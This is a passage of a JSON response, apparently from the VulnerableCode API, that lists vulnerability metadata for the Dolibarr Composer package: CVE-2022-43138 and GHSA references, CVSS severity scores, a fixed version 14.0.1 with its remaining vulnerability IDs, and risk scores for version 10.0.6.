AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138"},{"reference_url":"https://github.com/advisories/GHSA-gh7m-j673-wm97","reference_id":"GHSA-gh7m-j673-wm97","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gh7m-j673-wm97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19978?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2022-43138","GHSA-gh7m-j673-wm97"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zwts-bt1w-p7a4"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.6"}